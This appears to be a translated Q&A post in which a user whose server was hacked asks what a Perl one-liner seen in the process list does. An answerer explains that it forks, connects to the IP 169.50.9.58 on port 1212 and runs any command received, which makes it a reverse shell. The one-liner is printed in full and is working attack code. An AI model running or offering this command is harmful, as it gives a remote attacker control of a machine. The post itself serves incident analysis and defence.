我的服务器被黑了,并ps aux显示它现在正在运行此程序:
perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET (PeerAddr,"169.50.9.58:1212");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
我不知道Perl ......这个程序在做什么?
zdi*_*dim 11
它打开一个到该IP的套接字.然后它设置STDIN从中读取并STDOUT转到它.因此,它在流程和IP之间建立了直接的沟通渠道.
然后它进入一个while循环,通过system任何通过它运行STDIN.
它是在一个分叉的过程中完成此操作,即"即发即忘"(即时)样式,父项会立即退出.所以这会执行并退出,还有另一个与该IP通信并运行命令的进程.